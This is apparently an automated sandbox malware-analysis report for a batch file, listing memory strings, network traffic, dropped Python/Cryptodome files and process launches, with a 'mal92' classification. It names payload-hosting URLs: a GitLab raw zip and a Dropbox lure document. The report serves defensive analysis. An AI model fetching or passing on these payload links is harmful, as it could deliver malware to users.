            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio-stream.rst
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/symtable.rst
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/90716
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/95865
            Source: ann_module9.py.19.drString found in binary or memory: https://github.com/python/cpython/issues/96073
            Source: idna.py.19.drString found in binary or memory: https://github.com/python/cpython/issues/98433.
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D821B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/7160#discussion_r195405230
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/symtable.py
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE3C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2470819762.0000019DFB282000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2470819762.0000019DFB2B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip
            Source: powershell.exe, 0000000E.00000002.2470646595.0000019DFB160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/bose1511/mkt1511/-/raw/main/16fukrun.zip
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F11F672000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE3C25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D845D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lynx.invisible-island.net/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mhammond.github.io/pywin32_installers.html
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mhammond.github.io/pywin32_installers.html)1
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mhammond.github.io/pywin32_installers.htmlz?Please
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
            Source: powershell.exe, 0000000C.00000002.2245036004.000001F12EBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2245036004.000001F12EAB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2462251609.0000019DF3124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2462251609.0000019DF2FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3429137078.000001E0E7A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D852F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/apache2.0.php
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D852F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/mit-license.php
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D88EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-%04d/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D991D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D843D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D959D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D95AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D95BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0506/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
            Source: client.py.19.drString found in binary or memory: https://tools.ietf.org/html/rfc3986#appendix-A
            Source: client.py.19.drString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.3
            Source: _mode_siv.py.19.drString found in binary or memory: https://tools.ietf.org/html/rfc5297
            Source: client.py.19.drString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
            Source: pkcs1_15.py.19.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-36
            Source: pkcs1_15.py.19.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-37
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.com
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.com/cd/0/get/CemSesZ3f5jWCChWCH5OtQqhHQpW
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-basic-url-parser
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F11F672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
            Source: powershell.exe, 0000000C.00000002.2248528679.000001F136BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.do?r
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F11EA41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?
            Source: powershell.exe, 0000000C.00000002.2230026256.000001F11CF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_advertising_campaign_and_collaboration.docx?
            Source: powershell.exe, 0000000C.00000002.2249574202.000001F136EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/e2xjf5lc4ozmx1
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8B37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ibm.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/donations/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D873D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D88EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc%d.txt
            Source: idna.py.19.drString found in binary or memory: https://www.rfc-editor.org/rfc/rfc3454#section-3.1
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc3986#page-49
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sphinx-doc.org/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49752 version: TLS 1.2

            System Summary

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\tix8.4.3\tix84.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3454652512_2_00007FFD34546525
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3454632112_2_00007FFD34546321
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD3453425D14_2_00007FFD3453425D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34540CD019_2_00007FFD34540CD0
            Source: classification engineClassification label: mal92.evad.winBAT@28/1038@4/2
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hh5caubf.prs.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" "
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fInd
